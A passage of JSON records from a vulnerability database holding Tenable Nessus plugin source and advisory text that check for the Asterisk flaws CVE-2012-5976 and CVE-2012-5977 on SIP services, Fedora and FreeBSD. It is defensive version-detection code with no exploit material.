\"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"asterisk-11.5.1-2.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:43:04", "description": "According to the version in its SIP banner, the version of Asterisk running on the remote host is potentially affected by the following vulnerabilities :\n\n - A stack-based buffer overflow error exists related to SIP, HTTP and XMPP handling over TCP. 
Note that in the case of 'Certified Asterisk', SIP is not affected.\n Further note that in the case of XMPP, an attacker must establish an authenticated session first. (CVE-2012-5976)\n\n - An error exists related to device state cache and anonymous calls that could allow system resources to be exhausted. Note this vulnerability only affects systems configured to allow anonymous calls. (CVE-2012-5977)", "cvss3": {}, "published": "2013-02-20T00:00:00", "type": "nessus", "title": "Asterisk Multiple Vulnerabilities (AST-2012-014 / AST-2012-015)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:digium:asterisk"], "id": "ASTERISK_AST_2012_015.NASL", "href": "https://www.tenable.com/plugins/nessus/64717", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64717);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_bugtraq_id(57105, 57106);\n\n script_name(english:\"Asterisk Multiple Vulnerabilities (AST-2012-014 / AST-2012-015)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A telephony application running on the remote host is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version in its 
SIP banner, the version of Asterisk\nrunning on the remote host is potentially affected by the following\nvulnerabilities :\n\n - A stack-based buffer overflow error exists related to\n SIP, HTTP and XMPP handling over TCP. Note that in the\n case of 'Certified Asterisk', SIP is not affected.\n Further note that in the case of XMPP, an attacker must\n establish an authenticated session first. (CVE-2012-5976)\n\n - An error exists related to device state cache and\n anonymous calls that could allow system resources to be\n exhausted. Note this vulnerability only affects systems\n configured to allow anonymous calls. (CVE-2012-5977)\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2012-014.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://downloads.asterisk.org/pub/security/AST-2012-015.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://blog.exodusintel.com/2013/01/07/who-was-phone/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Asterisk 1.8.19.1 / 10.11.1 / 11.1.2, Certified Asterisk\n1.8.11-cert10 or apply the patches listed in the Asterisk advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2012-5976\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/02/20\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:digium:asterisk\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"asterisk_detection.nasl\");\n script_require_keys(\"asterisk/sip_detected\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"asterisk/sip_detected\");\n\n# see if we were able to get version info from the Asterisk SIP services\nasterisk_kbs = get_kb_list(\"sip/asterisk/*/version\");\nif (isnull(asterisk_kbs)) exit(1, \"Could not obtain any version information from the Asterisk SIP instance(s).\");\n\n# Prevent potential false positives.\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nis_vuln = FALSE;\nnot_vuln_installs = make_list();\nerrors = make_list();\n\nforeach kb_name (keys(asterisk_kbs))\n{\n vulnerable = 0;\n\n matches = eregmatch(pattern:\"/(udp|tcp)/([0-9]+)/version\", string:kb_name);\n if (isnull(matches))\n {\n errors = make_list(errors, \"Unexpected error parsing port number from kb name: \"+kb_name);\n continue;\n }\n\n proto = matches[1];\n port = matches[2];\n version = asterisk_kbs[kb_name];\n\n if (version == 'unknown')\n {\n errors = make_list(errors, \"Unable to obtain version of install on \" + proto + \"/\" + port);\n continue;\n }\n\n banner = get_kb_item(\"sip/asterisk/\" + proto + \"/\" + port + \"/source\");\n if (!banner)\n {\n # We have version but banner is missing; log error\n # and use in version-check though.\n errors = make_list(errors, \"KB item 'sip/asterisk/\" + proto + \"/\" + port + \"/source' is missing\");\n banner = 'unknown';\n }\n\n # Open Source 10x < 10.11.1\n if (version =~ \"^10([^0-9]|$)\" && \"cert\" >!< 
tolower(version))\n {\n fixed = \"10.11.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 11x < 11.1.2\n if (version =~ \"^11([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"11.1.2\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Open Source 1.8.x < 1.8.19.1\n if (version =~ \"^1\\.8([^0-9]|$)\" && \"cert\" >!< tolower(version))\n {\n fixed = \"1.8.19.1\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n # Asterisk Certified 1.8.11-certx < 1.8.11-cert10\n if (version =~ \"^1\\.8\\.11([^0-9]|$)\" && \"cert\" >< tolower(version))\n {\n fixed = \"1.8.11-cert10\";\n vulnerable = ver_compare(ver:version, fix:fixed, app:\"asterisk\");\n }\n\n if (vulnerable < 0)\n {\n is_vuln = TRUE;\n if (report_verbosity > 0)\n {\n report =\n '\\n Version source : ' + banner +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed + '\\n';\n security_warning(port:port, proto:proto, extra:report);\n }\n else security_warning(port:port, proto:proto);\n }\n else not_vuln_installs = make_list(not_vuln_installs, version + \" on port \" + proto + \"/\" + port);\n}\n\nif (max_index(errors))\n{\n if (max_index(errors) == 1) errmsg = errors[0];\n else errmsg = 'Errors were encountered verifying installs : \\n ' + join(errors, sep:'\\n ');\n\n exit(1, errmsg);\n}\nelse\n{\n installs = max_index(not_vuln_installs);\n if (installs == 0)\n {\n if (is_vuln)\n exit(0);\n else\n audit(AUDIT_NOT_INST, \"Asterisk\");\n }\n else if (installs == 1) audit(AUDIT_INST_VER_NOT_VULN, \"Asterisk \" + not_vuln_installs[0]);\n else exit(0, \"The Asterisk installs (\" + join(not_vuln_installs, sep:\", \") + \") are not affected.\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:36:54", "description": "The Asterisk Development Team has announced the release of Asterisk 11.2.0. 
This release is available for immediate download at http://downloads.asterisk.org/pub/telephony/asterisk\n\nThe release of Asterisk 11.2.0 resolves several issues reported by the community and would have not been possible without your participation.\nThank you!\n\nThe following is a sample of the issues resolved in this release :\n\n - --- app_meetme: Fix channels lingering when hung up under certain conditions (Closes issue ASTERISK-20486.\n Reported by Michael Cargile)\n\n - --- Fix stuck DTMF when bridge is broken. (Closes issue ASTERISK-20492. Reported by Jeremiah Gowdy)\n\n - --- Add missing support for 'who hung up' to chan_motif.\n (Closes issue ASTERISK-20671. Reported by Matt Jordan)\n\n - --- Remove a fixed size limitation for producing SDP and change how ICE support is disabled by default. (Closes issue ASTERISK-20643. Reported by coopvr)\n\n - --- Fix chan_sip websocket payload handling (Closes issue ASTERISK-20745. Reported by Inaki Baz Castillo)\n\n - --- Fix pjproject compilation in certain circumstances (Closes issue ASTERISK-20681. Reported by Dinesh Ramjuttun)\n\nFor a full list of changes in this release, please see the ChangeLog :\n\nhttp://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-11.2.0 The Asterisk Development Team has announced a security release for Asterisk 11, Asterisk 11.1.2. This release addresses the security vulnerabilities reported in AST-2012-014 and AST-2012-015, and replaces the previous version of Asterisk 11 released for these security vulnerabilities. The prior release left open a vulnerability in res_xmpp that exists only in Asterisk 11; as such, other versions of Asterisk were resolved correctly by the previous releases.\n\nThis release is available for immediate download at http://downloads.asterisk.org/pub/telephony/asterisk/releases\n\nThe release of these versions resolve the following two issues :\n\n - Stack overflows that occur in some portions of Asterisk that manage a TCP connection. 
In SIP, this is exploitable via a remote unauthenticated session; in XMPP and HTTP connections, this is exploitable via remote authenticated sessions. The vulnerabilities in SIP and HTTP were corrected in a prior release of Asterisk; the vulnerability in XMPP is resolved in this release.\n\n - A denial of service vulnerability through exploitation of the device state cache. Anonymous calls had the capability to create devices in Asterisk that would never be disposed of. Handling the cachability of device states aggregated via XMPP is handled in this release.\n\nThese issues and their resolutions are described in the security advisories.\n\nFor more information about the details of these vulnerabilities, please read security advisories AST-2012-014 and AST-2012-015.\n\nFor a full list of changes in the current release, please see the ChangeLog :\n\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-11.1.2\n\nThe security advisories are available at :\n\n - http://downloads.asterisk.org/pub/security/AST-2012-014.pdf\n\n - http://downloads.asterisk.org/pub/security/AST-2012-015.pdf\n\nThank you for your continued support of Asterisk - and we apologize for having to do this twice!\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "nessus", "title": "Fedora 18 : asterisk-11.2.0-1.fc18 (2013-1003)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:18"], "id": "FEDORA_2013-1003.NASL", "href": "https://www.tenable.com/plugins/nessus/64372", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-1003.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64372);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_xref(name:\"FEDORA\", value:\"2013-1003\");\n\n script_name(english:\"Fedora 18 : asterisk-11.2.0-1.fc18 (2013-1003)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Asterisk Development Team has announced the release of Asterisk\n11.2.0. 
This release is available for immediate download at\nhttp://downloads.asterisk.org/pub/telephony/asterisk\n\nThe release of Asterisk 11.2.0 resolves several issues reported by the\ncommunity and would have not been possible without your participation.\nThank you!\n\nThe following is a sample of the issues resolved in this release :\n\n - --- app_meetme: Fix channels lingering when hung up\n under certain conditions (Closes issue ASTERISK-20486.\n Reported by Michael Cargile)\n\n - --- Fix stuck DTMF when bridge is broken. (Closes issue\n ASTERISK-20492. Reported by Jeremiah Gowdy)\n\n - --- Add missing support for 'who hung up' to chan_motif.\n (Closes issue ASTERISK-20671. Reported by Matt Jordan)\n\n - --- Remove a fixed size limitation for producing SDP and\n change how ICE support is disabled by default. (Closes\n issue ASTERISK-20643. Reported by coopvr)\n\n - --- Fix chan_sip websocket payload handling (Closes\n issue ASTERISK-20745. Reported by Inaki Baz Castillo)\n\n - --- Fix pjproject compilation in certain circumstances\n (Closes issue ASTERISK-20681. Reported by Dinesh\n Ramjuttun)\n\nFor a full list of changes in this release, please see the ChangeLog :\n\nhttp://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-11.2.0\nThe Asterisk Development Team has announced a security release for\nAsterisk 11, Asterisk 11.1.2. This release addresses the security\nvulnerabilities reported in AST-2012-014 and AST-2012-015, and\nreplaces the previous version of Asterisk 11 released for these\nsecurity vulnerabilities. 
The prior release left open a vulnerability\nin res_xmpp that exists only in Asterisk 11; as such, other versions\nof Asterisk were resolved correctly by the previous releases.\n\nThis release is available for immediate download at\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases\n\nThe release of these versions resolve the following two issues :\n\n - Stack overflows that occur in some portions of Asterisk\n that manage a TCP connection. In SIP, this is\n exploitable via a remote unauthenticated session; in\n XMPP and HTTP connections, this is exploitable via\n remote authenticated sessions. The vulnerabilities in\n SIP and HTTP were corrected in a prior release of\n Asterisk; the vulnerability in XMPP is resolved in this\n release.\n\n - A denial of service vulnerability through exploitation\n of the device state cache. Anonymous calls had the\n capability to create devices in Asterisk that would\n never be disposed of. Handling the cachability of device\n states aggregated via XMPP is handled in this release.\n\nThese issues and their resolutions are described in the security\nadvisories.\n\nFor more information about the details of these vulnerabilities,\nplease read security advisories AST-2012-014 and AST-2012-015.\n\nFor a full list of changes in the current release, please see the\nChangeLog :\n\nhttp://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLo\ng-11.1.2\n\nThe security advisories are available at :\n\n -\n http://downloads.asterisk.org/pub/security/AST-2012-014.\n pdf\n\n -\n http://downloads.asterisk.org/pub/security/AST-2012-01\n 5.pdf\n\nThank you for your continued support of Asterisk - and we apologize\nfor having to do this twice!\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2012-014.pdf\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/security/AST-2012-015.pdf\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-11.2.0\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://downloads.asterisk.org/pub/telephony/asterisk/releases/\"\n );\n # http://downloads.asterisk.org/pub/telephony/asterisk/releases/ChangeLog-11.1.2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d7ebc469\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=891646\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=891649\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-January/097760.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ab374429\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected asterisk package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:asterisk\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2013/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/31\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! 
ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"asterisk-11.2.0-1.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"asterisk\");\n}\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:36:28", "description": "Asterisk project reports :\n\nCrashes due to large stack allocations when using TCP\n\nDenial of Service Through Exploitation of Device State Caching", "cvss3": {}, "published": "2013-01-04T00:00:00", "type": "nessus", "title": "FreeBSD : asterisk -- multiple vulnerabilities (f7c87a8a-55d5-11e2-a255-c8600054b392)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:asterisk10", "p-cpe:/a:freebsd:freebsd:asterisk11", "p-cpe:/a:freebsd:freebsd:asterisk18", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_F7C87A8A55D511E2A255C8600054B392.NASL", 
"href": "https://www.tenable.com/plugins/nessus/63379", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(63379);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n\n script_name(english:\"FreeBSD : asterisk -- multiple vulnerabilities (f7c87a8a-55d5-11e2-a255-c8600054b392)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Asterisk project reports :\n\nCrashes due to large stack allocations when using TCP\n\nDenial of Service Through Exploitation of Device State Caching\"\n );\n # http://downloads.digium.com/pub/security/AST-2012-014.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://downloads.digium.com/pub/security/AST-2012-014.html\"\n );\n # http://downloads.digium.com/pub/security/AST-2012-015.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://downloads.digium.com/pub/security/AST-2012-015.html\"\n );\n # https://www.asterisk.org/security\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.asterisk.org/downloads/security-advisories\"\n );\n # https://vuxml.freebsd.org/freebsd/f7c87a8a-55d5-11e2-a255-c8600054b392.html\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?ec84b9e8\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk10\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk11\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:asterisk18\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/01/02\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/01/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/01/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"asterisk11>11.*<11.1.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk10>10.*<10.11.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"asterisk18>1.8.*<1.8.19.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:40:19", "description": "The Asterisk Development Team has announced the release of Asterisk 1.8.20.0. This release is available for immediate download at http://downloads.asterisk.org/pub/telephony/asterisk\n\nThe release of Asterisk 1.8.20.0 resolves several issues reported by the community and would have not been possible without your participation. Thank you!\n\nThe following is a sample of the issues resolved in this release :\n\n - --- app_meetme: Fix channels lingering when hung up under certain conditions (Closes issue ASTERISK-20486.\n Reported by Michael Cargile)\n\n - --- Fix stuck DTMF when bridge is broken. (Closes issue ASTERISK-20492. Reported by Jeremiah Gowdy)\n\n - --- Improve Code Readability And Fix Setting natdetected Flag (Closes issue ASTERISK-20724. Reported by Michael L. Young)\n\n - --- Fix extension matching with the '-' char. (Closes issue ASTERISK-19205. 
Reported by Philippe Lindheimer, Birger 'WIMPy' Harzenetter)\n\n - --- Fix call files when astspooldir is relative. (Closes issue ASTERISK-20593. Reported by James Le Cuirot)\n\nFor a full list of changes in this release, please see the ChangeLog :\n\nhttp://downloads.asterisk.org/pub/telephony/asterisk/ChangeLog-1.8.20.0\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "nessus", "title": "Fedora 16 : asterisk-1.8.20.0-1.fc16 (2013-0992)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:asterisk", "cpe:/o:fedoraproject:fedora:16"], "id": "FEDORA_2013-0992.NASL", "href": "https://www.tenable.com/plugins/nessus/64369", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-0992.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(64369);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_xref(name:\"FEDORA\", value:\"2013-0992\");\n\n 
